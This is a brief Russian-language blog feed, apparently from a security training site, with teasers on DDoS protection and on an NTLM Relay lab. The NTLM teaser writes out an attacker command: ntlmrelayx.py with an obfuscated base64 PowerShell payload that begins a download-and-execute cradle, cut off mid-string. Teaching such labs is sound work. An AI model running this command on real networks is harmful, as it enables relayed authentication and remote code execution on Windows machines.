2 прочтения · 4 года назад
Защита от ddos атак
Ля начала разберемся со стеками протоколов TCP/IP которые используют для DDoS атак. Сама по себе TCP/IP это сетевая модель передачи данных в цифровом виде, которая описывает способ передачи данных от отправителя до получателя...
23 прочтения · 1 неделю назад
NTLM Relay
Протокол NTLM - старый, в нем великое множество архитектурных проблем, которые латаются с разной степенью успеха и надо бы его уже отправить на покой, однако, он по-прежнему вынужденно используется в сетях Windows. И его по-прежнему атакуют! Одной из старых атак, имеющих исправление, являетcя NTLM Relay. В курсе у нас есть лаба со следующим сценарием. 1. Атакующий запускает перехватчик: ntlmrelayx.py -tf targets.txt -c 'powershell.exe -exec bypass -enc SQBFAFgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgB